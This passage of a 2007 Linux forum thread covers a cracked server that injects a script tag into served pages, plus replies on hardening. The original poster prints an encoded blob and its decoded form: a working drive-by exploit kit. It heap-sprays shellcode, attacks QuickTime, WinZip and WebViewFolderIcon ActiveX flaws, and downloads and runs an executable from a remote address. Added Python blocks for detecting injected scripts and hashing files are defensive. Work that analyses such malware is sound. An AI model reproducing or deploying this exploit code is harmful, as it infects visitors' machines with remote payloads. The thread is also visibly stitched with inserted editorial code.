%6c%6c%3b%20%7d%0a%09%09%0a%09%09%69%66%20%28%61%2 9%20%7b%0a%09%09%09%69%66%20%28%21%20%76%5b%30%5d% 29%20%7b%0a%09%09%09%09%76%5b%30%5d%20%3d%20%43%72 %65%61%74%65%4f%62%6a%65%63%74%28%61%2c%20%22%6d%7 3%78%6d%6c%32%2e%58%4d%4c%48%54%54%50%22%29%3b%0a% 09%09%09%09%69%66%20%28%21%20%76%5b%30%5d%29%20%76 %5b%30%5d%20%3d%20%43%72%65%61%74%65%4f%
62%6a%65%63%74%28%61%2c%20%22%4d%69%63%72%6f%73%6f %66%74%2e%58%4d%4c%48%54%54%50%22%29%3b%0a%09%09%0 9%09%69%66%20%28%21%20%76%5b%30%5d%29%20%76%5b%30% 5d%20%3d%20%43%72%65%61%74%65%4f%62%6a%65%63%74%28 %61%2c%20%22%4d%53%58%4d%4c%32%2e%53%65%72%76%65%7 2%58%4d%4c%48%54%54%50%22%29%3b%0a%09%09%09%7d%0a% 0a%09%09%09%69%66%20%28%21%20%76%5b%31%5d%29%20%7b %0a%09%09%09%09%76%5b%31%5d%20%3d%20%43%72%65%61%7 4%65%4f%62%6a%65%63%74%28%61%2c%20%22%41%44%4f%44% 42%2e%53%74%72%65%61%6d%22%29%3b%0a%09%09%09%7d%0a %0a%09%09%09%69%66%20%28%21%20%76%5b%32%5d%29%20%7 b%0a%09%09%09%09%76%5b%32%5d%20%3d%20%43%72%65%61% 74%65%4f%62%6a%65%63%74%28%61%2c%20%22%57%53%63%72 %69%70%74%2e%53%68%65%6c%6c%22%29%3b%0a%09%09%09%0 9%69%66%20%28%21%20%76%5b%32%5d%29%20%7b%0a%09%09% 09%09%09%76%5b%32%5d%20%3d%20%43%72%65%61%74%65%4f %62%6a%65%63%74%28%61%2c%20%22%53%68%65%6c%6c%2e%4 1%70%70%6c%69%63%61%74%69%6f%6e%22%29%3b%0a%09%09% 09%09%09%69%66%20%28%76%5b%32%5d%29%20%6e%3d%31%3b %0a%09%09%09%09%7d%0a%09%09%09%7d%0a%09%
09%7d%0a%0a%09%09%69%2b%2b%3b%0a%09%7d%0a%0a%09%69 %66%20%28%76%5b%30%5d%20%26%26%20%76%5b%31%5d%20%2 6%26%20%76%5b%32%5d%29%20%7b%0a%09%09%76%61%72%20% 64%61%74%61%20%3d%20%58%4d%4c%48%74%74%70%44%6f%77 %6e%6c%6f%61%64%28%76%5b%30%5d%2c%20%75%72%6c%52%6 5%61%6c%45%78%65%29%3b%0a%09%09%69%66%20%28%64%61% 74%61%20%21%3d%20%30%29%20%7b%0a%09%09%09%76%61%72 %20%6e%61%6d%65%20%3d%20%22%63%3a%5c%5c%73%79%73%2 2%2b%47%65%74%52%61%6e%64%53%74%72%69%6e%67%28%34% 29%2b%22%2e%65%78%65%22%3b%0a%09%09%09%69%66%20%28 %41%44%4f%42%44%53%74%72%65%61%6d%53%61%76%65%28%7 6%5b%31%5d%2c%20%6e%61%6d%65%2c%20%64%61%74%61%29% 20%3d%3d%20%31%29%20%7b%0a%09%09%09%09%69%66%20%28 %53%68%65%6c%6c%45%78%65%63%75%74%65%28%76%5b%32%5 d%2c%20%6e%61%6d%65%2c%20%6e%29%20%3d%3d%20%31%29% 20%7b%0a%09%09%09%09%09%72%65%74%3d%31%3b%0a%09%09 %09%09%7d%0a%09%09%09%7d%0a%09%09%7d%0a%09%7d%0a%0 a%09%72%65%74%75%72%6e%20%72%65%74%3b%0a%7d%0a%0a% 66%75%6e%63%74%69%6f%6e%20%73%74%61%72%74%28%29%20 %7b%0a%0a%09%69%66%20%28%21%20%4d%44%41%
43%28%29%20%29%20%7b%20%73%74%61%72%74%4f%76%65%72 %66%6c%6f%77%28%30%29%3b%20%7d%0a%0a%7d%0a%0a%73%7 4%61%72%74%20%28%29%3b%0a%0a%3c%2f%73%63%72%69%70% 74%3e%0a%3c%2f%62%6f%64%79%3e%0a%3c%2f%68%74%6d%6c %3e%0a%0a%0a');

document.write (SB);


Cheers for any help offered

Paul
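Because the tag shows up regardless of page type and only on some requests, the place to look is the HTML the server actually sends, not the files on disk. The following is an added example (not code from the thread or from any of the posters) of a small check that parses a served page, lists every script tag, and flags any whose src is not in a known list, noting whether it sits directly after <body> as described above. The sample pages, the allowlist and the file name /js/site.js are constructed for the example; the injected src shfuy.js is the one quoted in the post.

```python
"""Flag script tags in served HTML that the site's own templates do not contain."""
from html.parser import HTMLParser

# Constructed samples: a clean page and the same page with a tag injected
# straight after <body>, using the src name quoted in the thread.
CLEAN_PAGE = (
    "<html><head><title>t</title></head><body>"
    "<h1>Hello</h1><script src='/js/site.js'></script></body></html>"
)
INFECTED_PAGE = (
    "<html><head><title>t</title></head><body>"
    "<script language='JavaScript' type='text/javascript' src='shfuy.js'></script>"
    "<h1>Hello</h1><script src='/js/site.js'></script></body></html>"
)

# Hypothetical allowlist: the script sources the site's templates really use.
KNOWN_SRCS = {"/js/site.js"}


class ScriptCollector(HTMLParser):
    """Collect (src, immediately_after_body) for every <script> start tag."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._last_tag = None  # most recent start or end tag seen

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            # True only when nothing but text separates <body> from this tag
            self.scripts.append((src, self._last_tag == "body"))
        self._last_tag = tag

    def handle_endtag(self, tag):
        self._last_tag = "/" + tag


def find_injected_scripts(html, known_srcs):
    """Return the script tags whose src is not on the allowlist.

    Each hit is a dict with the src and whether the tag directly follows <body>,
    which is the placement the thread reports. Inline scripts (no src) are
    reported as src=None so they are not silently ignored.
    """
    parser = ScriptCollector()
    parser.feed(html)
    return [
        {"src": src, "after_body": after_body}
        for src, after_body in parser.scripts
        if src not in known_srcs
    ]


if __name__ == "__main__":
    print(find_injected_scripts(CLEAN_PAGE, KNOWN_SRCS))     # []
    print(find_injected_scripts(INFECTED_PAGE, KNOWN_SRCS))  # one hit for shfuy.js
```

Run it against pages fetched over the network from several source addresses (the post notes the injection appears for a fresh client IP) rather than against the files on disk, since a clean file with a dirty response is exactly the symptom being described.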
 
Old 08-04-2007, 05:39 AM   #2
kentsbest
LQ Newbie
 
Registered: Aug 2007
Posts: 3

Original Poster
If it's any help, the basic encrypted parts, when decrypted, are:

<html>
<body>
<div id="mydiv"></div>

<script language="JavaScript">

var memory = new Array();
var mem_flag = 0;

function having() { memory=memory; setTimeout("having()", 2000); }

function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{spraySlide += spraySlide;}

spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}

function makeSlide()
{
var heapSprayToAddress = 0x0c0c0c0c;
var payLoadCode = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u80 01%uef33" +
"%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef% u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb" +
"%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66% ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7" +
"%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087% u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96" +
"%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615% uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85" +
"%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0% u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa" +
"%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7% uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf" +
"%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba% uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc" +
"%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc% uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba" +
"%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba% uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec" +
"%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403% ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c" +
"%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019% uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4" +
"%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4% uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07" +
"%u1011%uba10%ua3bd%ua0a2%uefa1" +
OUTPUT MR2 HERE
);
var heapBlockSize = 0x400000;
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x3;
var spraySlide = unescape("%u0c0c%u0c0c");

spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;

for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}

mem_flag = 1;
having();
return memory;
}

function startWVF()
{
for (i=0;i<128;i++)
{
try{
var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon .1');
tar.setSlice(0x7ffffffe, 0x0c0c0c0c, 0x0c0c0c0c,0x0c0c0c0c );
}catch(e){}
}
}

function startWinZip(object)
{
var xh = 'A';
while (xh.length < 231) xh+='A';
xh+="\x0c\x0c\x0c\x0c\x0c\x0c\x0c";
object.CreateNewFolderFromName(xh);
}

function startOverflow(num)
{
if (num == 0) {
try {
var qt = new ActiveXObject('QuickTime.QuickTime');
if (qt) {
var qthtml = '<object CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="1" height="1" style="border:0px">'+
'<param name="src" value="http://66.96.218.85/download/167212/movie.qtl">'+
'<param name="autoplay" value="true">'+
'<param name="loop" value="false">'+
'<param name="controller" value="true">'+
'</object>';
if (! mem_flag) makeSlide();
document.getElementById('mydiv').innerHTML = qthtml;
num = 255;
}
} catch(e) { }

if (num = 255) setTimeout("startOverflow(1)", 2000);
else startOverflow(1);

} else if (num == 1) {
try {
var winzip = document.createElement("object");
winzip.setAttribute("classid", "clsid:A09AE68F-B14D-43ED-B713-BA413F034904");

var ret=winzip.CreateNewFolderFromName(unescape("%00") );
if (ret == false) {
if (! mem_flag) makeSlide();
startWinZip(winzip);
num = 255;
}

} catch(e) { }

if (num = 255) setTimeout("startOverflow(2)", 2000);
else startOverflow(2);

} else if (num == 2) {

try {
var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon .1');
if (tar) {
if (! mem_flag) makeSlide();
startWVF();
}
} catch(e) { }
}
}


function GetRandString(len)
{
var chars = "abcdefghiklmnopqrstuvwxyz";
var string_length = len;
var randomstring = '';
for (var i=0; i<string_length; i++) {
var rnum = Math.floor(Math.random() * chars.length);
randomstring += chars.substring(rnum,rnum+1);
}

return randomstring;
}

function CreateObject(CLSID, name) {
var r = null;
try { eval('r = CLSID.CreateObject(name)') }catch(e){}
if (! r) { try { eval('r = CLSID.CreateObject(name, "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.CreateObject(name, "", "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject("", name)') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject(name, "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject(name)') }catch(e){} }
return(r);
}

function XMLHttpDownload(xml, url) {

try {
xml.open("GET", url, false);
xml.send(null);

} catch(e) { return 0; }

return xml.responseBody;
}

function ADOBDStreamSave(o, name, data) {

try {
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(data);
o.SaveToFile(name, 2);
o.Close();
} catch(e) { return 0; }

return 1;
}

function ShellExecute(exec, name, type) {

if (type == 0) {
try { exec.Run(name, 0); return 1; } catch(e) { }
} else {
try { exe.ShellExecute(name); return 1; } catch(e) { }
}

return(0);

}

function MDAC() {
var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E30}', '{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', null);
var v = new Array(null, null, null);
var i = 0;
var n = 0;
var ret = 0;
var urlRealExe =
OUTPUT MU2 HERE
;

while (t[i] && (! v[0] || ! v[1] || ! v[2]) ) {
var a = null;

try {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
} catch(e) { a = null; }

if (a) {
if (! v[0]) {
v[0] = CreateObject(a, "msxml2.XMLHTTP");
if (! v[0]) v[0] = CreateObject(a, "Microsoft.XMLHTTP");
if (! v[0]) v[0] = CreateObject(a, "MSXML2.ServerXMLHTTP");
}

if (! v[1]) {
v[1] = CreateObject(a, "ADODB.Stream");
}

if (! v[2]) {
v[2] = CreateObject(a, "WScript.Shell");
if (! v[2]) {
v[2] = CreateObject(a, "Shell.Application");
if (v[2]) n=1;
}
}
}

i++;
}

if (v[0] && v[1] && v[2]) {
var data = XMLHttpDownload(v[0], urlRealExe);
if (data != 0) {
var name = "c:\\sys"+GetRandString(4)+".exe";
if (ADOBDStreamSave(v[1], name, data) == 1) {
if (ShellExecute(v[2], name, n) == 1) {
ret=1;
}
}
}
}

return ret;
}

function start() {

if (! MDAC() ) { startOverflow(0); }

}

start ();

</script>
</body>
</html>
 
Old 08-04-2007, 07:15 PM   #3
jiml8
Senior Member
 
Registered: Sep 2003
Posts: 3,171

Seems pretty clear that the server has been cracked. I wonder...did you check the signatures on all the security updates to the server? Someone got you.

Do you have hard passwords set on SSH and ftp? Do you have root login disabled? Who has physical access to the server?

If you are unable to find the particular code that is compromised, your best solution is to start over with a clean install of the OS. Actually, this is your best solution anyway. After doing the clean install, install and configure tripwire to keep track of changes.
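The tripwire approach recommended above comes down to a stored baseline of file hashes compared against the live tree. As an added illustration (not code from the thread, and not tripwire itself), the block below builds a SHA-256 baseline over a directory, keeps it as JSON (in practice it would be stored off the box or on read-only media), and reports files that were added, removed or changed. The directory layout, file names (modules/mod_rewrite.so, httpd.conf, modules/mod_evil.so) and contents in demo() are constructed for the example and stand in for whatever the real web root and module directory contain.

```python
"""Minimal file-integrity baseline and comparison, in the spirit of tripwire."""
import hashlib
import json
import os
import tempfile


def sha256_file(path):
    """Hash a file in chunks so large binaries do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root):
    """Map every file under root (relative, '/'-separated) to its SHA-256."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = sha256_file(full)
    return baseline


def compare(baseline, current):
    """Report added, removed and changed paths between two baselines."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "changed": sorted(
            path for path in baseline
            if path in current and baseline[path] != current[path]
        ),
    }


def demo():
    """Constructed scenario: take a baseline, then tamper with the tree."""
    with tempfile.TemporaryDirectory() as root:
        modules = os.path.join(root, "modules")
        os.makedirs(modules)
        with open(os.path.join(modules, "mod_rewrite.so"), "wb") as f:
            f.write(b"original module bytes")  # hypothetical module content
        with open(os.path.join(root, "httpd.conf"), "w") as f:
            f.write("ServerName example.test\n")  # hypothetical config

        saved = json.dumps(build_baseline(root))  # what you would store off-box

        # Simulated tampering: one module altered, one added, config removed.
        with open(os.path.join(modules, "mod_rewrite.so"), "ab") as f:
            f.write(b"\x90appended")
        with open(os.path.join(modules, "mod_evil.so"), "wb") as f:
            f.write(b"new file")  # constructed name, not a real module
        os.remove(os.path.join(root, "httpd.conf"))

        return compare(json.loads(saved), build_baseline(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The baseline is only as trustworthy as the host it was taken on, which is why the advice is to take it right after the clean install and keep the stored copy where the server cannot rewrite it.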
 
Old 08-04-2007, 10:33 PM   #4
Crito
Senior Member
 
Registered: Nov 2003
Location: Knoxville, TN
Distribution: Kubuntu 9.04
Posts: 1,168

Quote:
Originally Posted by kentsbest
Unfortunately the solution (use grsecurity kernel) does not make any sense and I suspect that it would be a temporary solution.
Sounds like the right solution to me, and a permanent one too. Though if you're going to rebuild using a newer version of RHEL might as well use SELinux instead.

Last edited by Crito; 08-04-2007 at 10:36 PM.
 
Old 08-04-2007, 10:53 PM   #5
blackraider
LQ Newbie
 
Registered: Apr 2006
Location: Dark Side of Linux
Distribution: Gentoo AMD64
Posts: 6


Maybe it could help to know that the name of the virus is JS:IESlice.

It is detected under this name by Avast Antivirus. It seems to be new in the city (first sightings reported on July 15 or so) and only a few references exist on the web about this trojan downloader.
 